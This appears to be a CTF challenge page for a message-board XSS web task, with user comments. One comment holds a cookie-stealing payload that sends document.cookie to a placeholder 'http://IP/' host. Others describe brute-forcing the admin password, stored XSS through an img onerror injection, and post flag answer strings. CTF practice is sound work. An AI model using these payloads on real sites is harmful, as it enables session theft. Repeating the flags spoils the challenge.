留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 3117
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
popoh 1年前

db.sql压根就没有

回复 6

songci 1年前

flag{750d33e925f6dbf1784a1a924c237534}

回复 0

19881191586 1年前

第一步:用御剑或dirsearch扫描后台,发现index.php和admin.php 第二步:用工具爆破admin的登录密码 第三步:进入admin页面,刷新页面,弹出提示,提示里面出现URL编码后的flag 第四步:URL解码

回复 3

treasure11 2年前

....太难了

回复 0

mAns0nw0W 2年前

flag{0d25978069e52fed99591c5c19ca0663}

回复 0

APTX4869ZRC 2年前

BugKu真的很酷

回复 0

Warm2pPing 2年前

提示:需要xss平台接收flag 那就是自己找一个XSS平台咯~ 然后开始注入 大概是平台地址加上 ?cookie=+document.cookie 没时间了自己拼接吧

回复 0

kanljk 2年前

<svg onload="window.open('http://IP/'+document.cookie)">

回复 0

XRain 2年前

思路想错了,我一直在测试前台留言的XSS,前台留言时在 [img][/img] 之间插入超长字符串,就会导致 img 标签的 src 属性的双引号没有闭合,直到再次留言时插入的 [img][/img] 才闭合,所以可以给后一次留言中的 img 标签注入 onerror 属性及其 js 代码,最终导致前台存储型 XSS。不过,我离题了,白白浪费了半天的时间。

回复 0

18363158240 2年前

小括号被转成‘|’了,xss漏洞被修复了

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(18)

解题动态

zzuer 攻破了该题 15小时前
123456lulu 攻破了该题 23小时前
WWWWWWYY 攻破了该题 1天前
WYYYYTT 攻破了该题 2天前
igrazee 攻破了该题 2天前
zrc2682 攻破了该题 2天前
bhcxzhdsa 攻破了该题 3天前
鲲中霸王 攻破了该题 3天前
xiaodd 攻破了该题 3天前
244012105 攻破了该题 3天前
白菜白又白 攻破了该题 3天前
2301144040 攻破了该题 4天前
weini12345 攻破了该题 5天前
zxcvbnmzhang 攻破了该题 7天前
out不慢 攻破了该题 8天前
顾无澜 攻破了该题 10天前
luo157 攻破了该题 10天前
sunshb07 攻破了该题 12天前
紫色心情 攻破了该题 15天前
caocao 攻破了该题 16天前
问题反馈